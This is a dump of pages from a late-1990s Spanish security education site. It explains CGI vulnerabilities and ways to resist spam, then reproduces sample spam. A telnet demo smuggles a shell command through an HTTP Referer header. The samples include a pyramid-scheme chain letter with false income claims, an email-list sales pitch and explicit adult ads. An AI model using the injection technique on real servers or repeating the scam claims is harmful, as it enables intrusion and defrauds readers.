Al pulsar el botn, vemos que nos aparece la direccin de la pgina desde la que
venimos. Si en vez de apretar el botn de Procesar datos, abro una conexin telnet al
puerto 80 y envo el siguiente comando, se obtiene:
telnet www.iec.csic.es 80
Trying 161.111.31.119...
Connected to viznar.iec.csic.es.
Escape character is '^]'.
GET /cgi-bin/referer.exe HTTP/1.0
Referer: "dir"
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Tue, 24 Mar 1998 17:56:55 GMT
Content-type: text/html
<html> <head>
<title>Cmo explotar el HTTP_REFERER</title>
</head>
<body>
<h1>Cmo explotar el HTTP_REFERER</h1>
Vienes de HTTP_REFERER = "dir"
</body> </html>
Connection closed by foreign host.
Nota: En rojo aparece lo que debes escribir en tu ordenador. En azul, las respuestas del servidor.
Ataque REFERER
Consejos prcticos
como la siguiente:
if [ $HTTP_REFERER ]
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Vulnerabilidad en CGI
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Vulnerabilidad
El punto vulnerable de la programacin en CGI, es decir, la
Peligros
amenaza que representan para la seguridad del servidor, es doble:
Vulnerabilidad
Por un lado, la posibilidad de que el CGI sea engaado por
la entrada del usuario para que ejecute comandos
SSI
imprevistos, pudiendo llegar a causar graves daos en el
servidor;
Llamada a programas
de otro, la posibilidad de revelar innecesariamente
informacin acerca del servidor, que permitir al atacante conocer mejor la
configuracin del sistema y estar as mejor equipado para buscar posibles
agujeros por los que colarse.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Llamada a programas
Uno de los aspectos ms delicados de la programacin con CGI,
Peligros
es la llamada a otros programas o comandos del sistema desde la
aplicacin CGI. Un ejemplo tpico sera el enviar un correo a un
Vulnerabilidad
usuario a la direccin que ste ha introducido a travs de un
formulario. Para ello puede invocarse al programa sendmail,
SSI
abriendo un shell mediante diversos mecanismos. Ya veremos
cmo estas llamadas pueden ser subvertidas por un atacante, de
Llamada a programas
manera que se ejecuten otros comandos adems del esperado, con
el fin de causar daos al sistema u obtener informacin sobre el mismo.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Los que lo deseen pueden consultar el texto con los resultados de la encuesta.
Comercio electrnico
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
The Cathedral and the Bazaar (87 KB), artculo de referencia sobre el
movimiento de software abierto, escrito por Eric S. Raymond
open source software resources tutorials information at open source IT
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Introduccin
Por qu es malo
Cmo evitarlo
Truco casero
Recursos
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Los spammers (los que envan correo basura) son gentes sin escrpulos, que no
tienen reparos en congestionar servicios de acceso a Internet, como ocurri con
America On Line, que se dice lleg a recibir 1,8 millones de correos basura al da de
CyberPromotions. Suponiendo que una persona emplee diez segundos en identificar
y descartar de su buzn un correo como basura, significara que se desperdiciaran
5.000 horas de tiempo de conexin por da simplemente para deshacerse de esos
correos, y slo en AOL. Sumemos el tiempo de conexin en todo la Red. Nada en el
mundo cuesta tan poco al anunciante y tanto al destinatario.
Adems, en muchas ocasiones los contenidos rozan la ilegalidad, si es que no son
manifiestamente ilegales, como la pornografa infantil.
Podis aprender ms sobre los efectos perniciosos del spam en los informes de Bright
file:///C|/TEMP/criptonomicon/criptonomicon/spam/spammalo.html (1 of 2) [25/10/2000 02:33:05 p.m.]
Light Technologies.
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Cmo evitarlo
sta es una cuestin peliaguda, ya que, estrictamente hablando, no
existe forma humana (ni mecnica) de evitarlo por completo. Se
pueden apuntar una serie de sugerencias, que si bien no nos
impermeabilizarn al correo basura, s que al menos lo harn
disminuir significativamente.
Introduccin
Por qu es malo
Cmo evitarlo
Truco casero
Recursos
En los pocos casos en que dentro del correo basura aparezca la
direccin electrnica o postal, telfono, fax o lo que sea, del
spammer, se les puede contestar dicindoles que nos borren de sus
listas. Desgraciadamente, no suelen incluir estos datos, y las direcciones de correo (lo
que vemos en el campo De: de nuestro cliente de correo) suelen ser falsas o han
sido suplantadas (spoofing). Y lo que es peor. A veces responderles pidiendo que nos
eliminen equivale a confirmar que nuestra direccin de correo es vlida, con lo cual
pueden venderla a terceros, despus de haberse asegurado de que corresponde a un
usuario real. Por este ltimo motivo, puede ser una buena idea mandarles un correo
con un mensaje de error, como si esa direccin no existiese.
Referencias
Libro de Visitas
Conscientes de las tcnicas de que se sirven los spammers para recolectar por la Red
direcciones de correo, lo ms inteligente es no dejar nuestra direccin en sus lugares
predilectos de rapia, como los grupos de noticias de Usenet y las listas de
distribucin. Para el primer caso, se puede eliminar nuestra direccin de la tpica
firma al final del mensaje o bien advertir de que se cambiar alguna letra, de modo
que los programas automticos de buitreo de direcciones las recojan alteradas y por
lo tanto inservibles. Por ejemplo:
email: <gonzalo@iec.csic.es-antispam>
(no olvide eliminar -antispam al responder)
Tambin debes cambiarlo en el campo De: y Responder a: de tu cliente de correo.
Ahora DejaNews ofrece un servicio gratis de correo antispam para las news.
Prubalo!
En el segundo caso, es importante asegurarse de que nuestra direccin de correo no
aparecer cuando se enva el comando para mostrar toda la gente suscrita a una lista.
Lo mejor es ponerse en contacto con el responsable de la lista y aclarar estos asuntos.
Por supuesto, otra manera para ocultar nuestra identidad al enviar correos o escribir
noticias es ayudarnos de los repetidores de correo annimos, que nos permiten
participar en las noticias de Usenet y escribir correos sin que aparezca nuestro
nombre o direccin de correo autntica. Tambin existe la posibilidad de emplear
alias, proporcionados por algunos proveedores de acceso a Internet.
Existen robots que buscan direcciones de correo por las pginas de Internet. Para
frustrar sus esfuerzos, se puede incluir la direccin de correo en una imagen, en
formato gif o jpg, de manera que cualquier lector humano sea capaz de reconocerla,
mientras que les pasar inadvertida a los robots automticos. Puedes ver un ejemplo
en mi pgina de copyright.
Si te disgusta que incluso los humanos que visitan tu pgina conozcan tu direccin de
correo, puedes no revelarla en absoluto. En su defecto, puedes crear un formulario
que habrn de rellenar para que enviarte sus comentarios, es decir, crear algo
parecido a los libros de visitas.
En ltimo lugar, para el que est obsesivamente interesado en no dejar ni rastro de su
direccin de correo en ningn lugar de la Red, sera conveniente que escribiese a los
numerosos servicios de directorios, en los que se pueden buscar nombres de persona
a partir de direcciones de correo y viceversa, como Yahoo! People Search,
WhoWhere, Bigfoot, Internet Address Finder, InfoSpace, etc. Su inconveniente,
claro est, es que no slo no nos encontrarn los spammers, sino ninguna otra
persona con intenciones ms benvolas. En fin, el precio de la intimidad.
Los ms atrevidos, no os perdis el siguiente truco anti-spam, el ms efectivo de
todos los mtodos descritos si recibes spam.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Truco casero
Muchos spammers incluyen una lnea en la que dicen que se
mande un reply a una cierta direccin si queremos que nos
eliminen de su lista de correo. En realidad se trata de una artimaa
para asegurarse de que nuestra direccin de correo es vlida y as
poder revenderla a otros spammers o seguir ellos mismos
envindonos spam. Es decir, que puede resultar poco
recomendable responder a una direccin desde la que hemos
recibido spam, ya que estamos confirmando la existencia de
nuestra cuenta de correo.
Agujeros
Spam
Mailer-Daemon@tudomino.es
Postmaster@tudomino.es
Anonimato
Correo seguro
Por qu es malo
Cmo evitarlo
Truco casero
Recursos
No basta pues con no responder, sino que se les puede enviar un mensaje de error
como si procediera del administrador o del demonio de correo. Para ello, podis
configurar vuestra cuenta de correo electrnico de la siguiente forma. En la seccin
de informacin del usuario, en el campo Nombre, podis poner alguno de los
siguientes:
Crashes
Remailers
Introduccin
Una vez que ya los has configurado, creas un correo nuevo y en el Asunto (Subject)
escribes alguno de los siguientes:
Returned mail: User unknown
Mail System Error - Returned Mail
Nondeliverable mail
Web seguro
Referencias
reason:
The following destination addresses were unknown (please
check
the addresses and re-mail the message):
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Recursos en la Red
Informacin
What is spam?
MailObscuro - Antispam
Crashes
Productos
Agujeros
Spam
MailJail 2.3 ()
Remailers
Anonimato
Correo seguro
Web seguro
Introduccin
Por qu es malo
Cmo evitarlo
Truco casero
Recursos
Referencias
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Libro de Visitas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
Your European Connection to Hot Beautiful XXX Live Girls!!!
Voted as the 1998 Best Adult Sites!
*LIVE GIRL SEX SHOWS!!!
* 10 FREE Live Video Feeds &
*FREE Erotic Stories!!
*1,000's of Free Pictures of
*Confessions!!!
*Plus Free Pictures of Teens
*Live Erotic Chat!!!
*Gambling
* Tons of free stuff!!!
So Much More we can't fit it
Chatrooms!!!
XXX Porn Stars!!
& Men!!!
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
Initially I sent out 10,000 emails. It only cost me about $15.00 for
my time on-line. The great thing about email is that I didn't need
any money for printing to send out the program, only the cost to
fulfill my orders. I am telling you like it is, I hope it doesn't
turn you off, but I promised myself that I would not "rip-off" anyone,
no matter how much money it cost me!.
In less than one week, I was starting to receive orders for REPORT #1.
By January 13th, I had received 26 orders for REPORT #1. When you
read the GUARANTEE in the program, you will see that "YOU MUST RECEIVE 20 ORDERS FOR
REPORT #1 WITHIN TWO WEEKS. IF YOU DON'T, SEND OUT MORE PROGRAMS UNTIL YOU DO!" My
first step in making $50,000 in 90 days was done. By January 30th, I had received 196
orders for REPORT #2. If you go back to the GUARANTEE, "YOU MUST RECEIVE 100
OR MORE ORDERS FOR REPORT #2 WITHIN TWO WEEKS. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU
DO. ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL."
Well, I had 196 orders for REPORT #2, 96 more than I needed. So I sat back and relaxed.
By March 19th, of my emailing of 10,000 packets, I received $58,000 with more coming in
every day.
I paid off ALL my debts and bought a much needed new car. Please
take time to read the attached program, IT WILL CHANGE YOUR LIFE
FOREVER! Remember, it wont work if you don't try it. This program
does work, but you must follow it EXACTLY! Especially the rules of
not trying to place your name in a different place. It doesn't work,
you'll lose out on a lot of money! REPORT #2 explains this.
Always follow the guarantee, 20 orders for REPORT #1, and 100
or more orders for REPORT #2 and you will make $50,000 or more in about 90 days.
LIVING PROOF THAT IT WORKS !!!
If you choose not to participate in this program, I'm sorry. It
really is a great opportunity with little cost or risk to you. If you
choose to participate, follow the program and you will be on your way
to financial security.
If you are a fellow business owner and you are in financial trouble
like I was, or you want to start your own business, consider this a
sign. I DID!
Sincerely,
Christopher Erickson
PS Do you have any idea what 11,700 $5 bills ($58,000) look like
piled up on a kitchen table? IT'S AWESOME!
"THREW IT AWAY"
"I had received this program before. I threw it away, but later
wondered if I shouldn't have given it a try. Of course, I had no idea
who to contact to get a copy, so I had to wait until I was emailed
another copy of the program. Eleven months passed, then it came. I
DIDN'T throw this one away. I made $41,000 on the first try."
Dawn W., Evansville, IN
"NO FREE LUNCH"
"My late father always told me, 'remember, Alan, there is no free
lunch in life. You get out of life what you put into it.' Through
trial and error and a somewhat slow frustrating start, I finally
figured it out. The program works very well, I just had to find the
right target group of people to email it to. So far this year, I have
made over $63,000 using this program. I know my dad would have been
very proud of me."
Alan B., Philadelphia, PA
A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM
By the time you have read the enclosed information and looked over the
enclosed program and reports, you should have concluded that such a
program, and one that is legal, could not have been created by an
amateur.
Let me tell you a little about myself. I had a profitable business
for ten years. Then in 1979 my business began falling off. I was
doing the same things that were previously successful for me, but it
wasn't working. Finally, I figured it out. It wasn't me, it was the
economy. Inflation and recession had replaced the stable economy that
had been with us since 1945. I don't have to tell you what happened
to the unemployment rate...because many of you know from first hand
experience. There were more failures and bankruptcies than ever
before.
I AM
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
The middle class was vanishing. Those who knew what they were doing invested wisely and
moved up. Those who did not, including those who never had anything to save or invest,
were moving down into the ranks of the poor. As the saying goes, "THE RICH GET RICHER
AND THE POOR GET POORER." The traditional methods of making money will never allow you
to "move up" or "get rich", inflation will see to that.
You have just received information that can give you financial freedom
for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF
EFFORT." You can make more money in the next few months than you have ever imagined.
I should also point out that I will not see a penny of your money, nor
anyone else who has provided a testimonial for this program. I have
already made over FOUR MILLION DOLLARS! I have retired from the
program after sending out over 16,000 programs. Now I have several
offices which market this and several other programs here in the US
and overseas. By the Spring, we wish to market the 'Internet' by a
partnership with AMERICA ON LINE.
Follow the program EXACTLY AS INSTRUCTED. Do not change it in any way. It works
exceedingly well as it is now. Remember to email a copy of this exciting program to
everyone that you can think of. One of
the people you send this to may send out 50,000...and your name will
be on every one of them!. Remember though, the more you send out, the more potential
customers you will reach.
So my friend, I have given you the ideas, information, materials and
opportunity to become financially independent, IT IS UP TO YOU NOW!
"THINK ABOUT IT"
Before you delete this program from your mailbox, as I almost did,
take a little time to read it and REALLY THINK ABOUT IT. Get a pencil
and figure out what could happen when YOU participate. Figure out the
worst possible response and no matter how you calculate it, you will
still make a lot of money! Definitely get back what you invested.
Any doubts you have will vanish when your first orders come in. IT
WORKS!
Paul Johnson, Raleigh, NC
HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$
Let's say that you decide to start small, just to see how it goes, and
we'll assume you and all those involved send out 20,000 programs each.
Let's also assume that the mailing receives a .5% response. Using a
good list the response could be much better. Also many people will
send out hundreds of thousands of programs instead of 20,000. But
continuing with this example, you send out only 20,000 programs. With
a .5% response, that is only 10 orders for REPORT #1. Those 10 people
respond by sending out 20,000 programs each for a total of 200,000. Out
of those .5%, 100 people respond and order REPORT #2. Those 100 mail
out 20,000 programs each for a total of 2000,000. The .5% response to
that is 1,000 orders for REPORT #3. Those 1,000 send out 20,000
programs each for a 2,000,000 total. The .5% response to that is
10,000 orders for REPORT #4. That's 10,000 five dollar bills for you.
CASH!!!! Your total income in this example is $50 + $500 + $5000 +
$50,000 for a total of $55,550!!!!
REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU MAIL TO WILL DO
ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM! DARE TO THINK FOR A MOMENT WHAT WOULD
HAPPEN IF EVERYONE OR HALF SENT OUT
100,000 PROGRAMS INSTEAD OF ONLY 2,000. Believe me, many people will do that and more!
By the way, your cost to participate in this is practically nothing. You obviously
already have an internet
connection and email is FREE!!! REPORT#3 will show you the best
methods for bulk emailing and purchasing email lists.
THIS IS A LEGITIMATE,NOW VERY LEGAL, MONEY MAKING OPPORTUNITY. It does not require you
to come in contact with people, do any hard work, and best
of all, you never have to leave the house except to get the mail. If
you believe that someday you'll get that big break that you've been
waiting for, THIS IS IT! Simply follow the instructions, and your
dream will come true. This multi-level email order marketing program
works perfectly...100% EVERY TIME. Email is the sales tool of the
future. Take advantage of this non-commercialized method of
advertising NOW!! The longer you wait, the more people will be doing
business using email. Get your piece of this action!!
MULTI-LEVEL MARKETING (MLM) has finally gained respectability. It is being taught in the
Harvard Business School, and both Stanford
Research and The Wall Street Journal have stated that between 50% and 65% of all goods
and services will be sold throughout Multi-level
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
Methods by the mid to late 1990's. This is a Multi-Billion Dollar
industry and of the 500,000 millionaires in the US, 20% (100,000) made
their fortune in the last several years in MLM. Moreover, statistics
show 45 people become millionaires everyday through Multi-Level
Marketing.
INSTRUCTIONS
We at Erris Mail Order Marketing Business, have a method of raising
capital that REALLY WORKS 100% EVERY TIME. I am sure that you could use $50,000 to
$125,000 in the next 90 days. Before you say
"Bull", please read the program carefully.
This is not a chain letter, but a NOW perfectly legal money making
opportunity. Basically, this is what we do: As with all multi-level
business, we build our business by recruiting new partners and selling
our products. Every state in the USA allows you to recruit new multilevel business partners, and we offer a product for EVERY dollar sent.
YOUR ORDERS COME AND ARE FILLED THROUGH THE MAIL, so you are not involved in personal
selling. You do it privately in your own home, store or office.
This is the GREATEST Multi-level Mail Order Marketing anywhere:
Step (1)
Step (2)
Step (3)
Step (4)
IMPORTANT: You won't get a good response if you use an old list, so
always request a FRESH, NEW list. You will find out where to purchase
these lists when you order the four 4 REPORTS.
ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!
REQUIRED REPORTS
***Order each REPORT by NUMBER and NAME***
ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE
AND $5 USD CASH FOR EACH ORDER REQUESTING THE
SPECIFIC REPORT BY NAME AND NUMBER
(International orders should also include $2 USD extra for postage)
Add your e amil address when sending in for your report this is for
updated information and continueing support (optional) that will
be handed down by your sponcers pipeline.
______________________________________________________
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
REPORT #1
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"
ORDER REPORT #1 FROM:
A. Siegmund #57
Trakehnenstr. 13
53332 Bornheim, Germany
______________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT#2 FROM:
J. Maz
15774 S. Lagrange Rd
Suite #312
Orland Pk, IL 60462
USA
________________________________________________________
REPORT#3
"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:
B. Thompson
13504 Greencaslte ridge Tr. 404
Burtonsville MD. 20866
USA
______________________________________________________
REPORT #4
"EVALUATING MULTI-LEVEL SALES PLANS"
ORDER REPORT #4 FROM:
MUW #2
PO BOX 71442
SALT LAKE CITY, UT 84171-0442
USA
______________________________________________________
CONCLUSION
One of your free web sites can be registered at http://www.freeyellow.com/
.I am enjoying my fortune that I made by sending out this program.
You too, will be making money in 20 to 90 days, if you follow the
SIMPLE STEPS outlined in this mailing.
To be financially independent is to be FREE. Free to make financial
decisions as never before. Go into business, get into investments,
retire or take a vacation.
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
It can also really enhance your love life. If you're
in a relationship, it works great, because you are
able to fully understand your own and your partner's
emotions and motivations. If you're not, you will know
exactly what you want from your perfect mate and what
they will find attractive about you.
Another big advantage to becoming balanced and happy
is that good health runs hand in hand.
Take a closer look two free pages of information at:
http://www.po9.com
************************************************************************************************
**** THE MOST POWERFUL FORM OF ADVERTISING TODAY ****
***** CAN BE YOURS *****
"Sales, it's a numbers game"
The more people that are exposed to your product, the more sales
you will make. Have you ever gotten catalogs in the mail? Maybe you
have never bought from them, but they keep sending them each and
every month!
Why would they do this?
Because it's PROFITABLE! A certain percentage of people buy from
them each and every month. They know this, but they just don't know
who those people are. Thus, they mail everyone on their lists.
Did you know that there is a method of marketing that costs pennies
but have the same effect as direct postal mail?
You can now compete with the big boys, with exposure in MASSIVE
NUMBERS, without expensive investments such as those associated with
television commercials, radio advertising, direct postal mail, or
tele-marketing.
THE SOLUTION - Direct E-mail Marketing
We have developed and maintained a list of Active E-MAIL ADDRESSES in
MILLIONS covering the internet. We gather the addresses from "hits" at
certain targeted web sites, the internet and numerous reliable sources.
The list is a compilation of general and targeted email addresses all
sorted, categorized and combined by domain in sequential batches.
The list is updated bi-weekly.
"Quality before Quantity"
WARNING:
There are vendors marketing 25, 40, 57, and 60 million lists.
These are the worst addresses to purchase. Most of those email
addresses are random generated based on common email formats using
random email generator softwares. This means they are made up and
not harvested. This also means that they have a LOWER percentage
of deliverability.
Some vendors sell these lists for as low as $25. Just remember,
you'll get what you paid for from these amateur vendors. Its nice to
have a big list but if they're all junk ...... they're useless.
AGAIN ......."Quality before Quantity"
We have researched the market completely. Our research indicates that
OTHER companies marketing lists always lacked support and complete
documentation. What good is any product if there is no support or
instructions accompanied.
We provide you with FULL TECH SUPPORT, basic SOFTWARE needed,
COMPLETE INSTRUCTIONS, optional TOOLS and SOFTWARE to
MAXIMIZE your respone while EFFICIENTLY completing the task.
Using our software wizards, getting started is as easy as 1-2-3.
Whether you're novice or advanced. All this available in....
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
CD-ROM
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- DEMO VERSION
- DEMO VERSION
million
million
million
million
million
$99.95
$119.95
$139.95
$149.95
$159.95
O R D E R
Monday - Friday
F O R M
~^~^~^~^~^~^~^~^~^~^
Ref ID # 1434A236
Name (User):________________________________________________
Company:_________________________________Position:__________
Phone #:_______________________Fax #:_______________________
Email (MUST):_______________________________________________
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
** Confirmation and shipping information sent via e-mail
CREDIT CARDS : Address must match the card's billing address
CHECKS : Include street mailing address to be processed
Address:____________________________________________________
____________________________________________________________
** CD-ROM only
__ Win 95
__
__
__
__
__
Email
Email
Email
Email
Email
__Win 3.x
list
list
list
list
list
(2 million = $99.95)
(4 million = $119.95)
(7 million = $139.95)
(9 million = $149.95)
(11 million = $159.95)
__Visa
__Mastercard
__American Express
__Discover
Card Number:______________________________________Exp:_______
Name on Card:__________________________________Amount:_______
Signature:______________________________________Date:__________
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
All figures, percentages and response rates are for example
purposes only. The actual figures, percentages and response
rates may vary. The individual or group may earn less or more
than the examples provided in this advertisement.
We are an independent and private company. We are NOT directly or
indirectly associated, endorsed or affiliated with any internet
service provider(s) or commercial online service provider(s)
contained within this message, its headers, sub-headers and any
portion whatsoever.
************************************************************************************************
--acentos omitidos-Muy Sr. Nuestro:
Primero quisieramos pedirle disculpas por entrar de esta forma en su oficina.
Nos ponemos en contacto con usted para presentarle Puntolog,
http://www.puntolog.com
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
punto de encuentro para el sector de la logistica industrial ( manutencion, almacenaje,
manipulacion, robotica, automatica, ... ).
Puntolog tiene como fin servir de nexo entre las diferentes areas de este sector. A
traves de sus secciones podemos permanecer al dia de las novedades existentes en el
mercado, tanto de nuestro pais como del exterior, ver que instalaciones se han hecho
recientemente, consultar dudas a otros profesionales, informarnos de las ferias,
convenciones que van a tener lugar en todo el mundo, y dialogar, a traves del foro, con
otros colegas del sector sobre temas de actualidad.
Le invitamos a navegar por nuestras paginas y de esta forma conocer las diferentes
secciones que en ellas se encuentran. Con nosotros tienen la oportunidad de dar a conocer
sus productos, novedades y servicios a la vez que se relacionan desde su oficina,
de una forma interactiva, con un gran numero de empresas y profesionales.
Gracias por habernos dedicado estos minutos. Esperamos tenerle pronto navegando con
nosotros y utilizando nuestros servicios y espacios.
Atentamente.
Puntolog - Punto de Encuentro del Desarrollo Industrial
http://www.puntolog.com
administracion@puntolog.com
************************************************************************************************
Your Connection to Hot Sexy XXX Live Girls & Adult SEX!
*LIVE GIRL SEX SHOWS!!!
* 10 FREE Live Video Feeds & Chatrooms!!!
*FREE Erotic Stories!!
*1,000's of Free Pictures of XXX Porn Stars!!
*Confessions!!!
*Plus Free Pictures of Teens & Men!!!
*Live Erotic Chat!!!
*Gambling
* Tons of free stuff!!!
So Much More we can't fit it on this page!
See for yourself, Go check it out!!!
You must be 21 or older.
http://207.36.81.148
<A HREF="http://207.36.81.148">AOL CLICK HERE</A>
If you take offense to this email & wish to be taken
off our list,simply e-mail us at: steven@hotmail.com
We're sorry for any convience.
This is a one time mailing only.
oC
************************************************************************************************
>>Young Hot Girls New Site
Can you handle 2 young, hot, sexy girls? Cum watch us at:
http://www.livewhorehouse.com
Where you can complete our menage-a-trois.
We really hate it when you don't cum.
Luv
Nadia and Alexa
XOXOXOXOXOXO
======================================
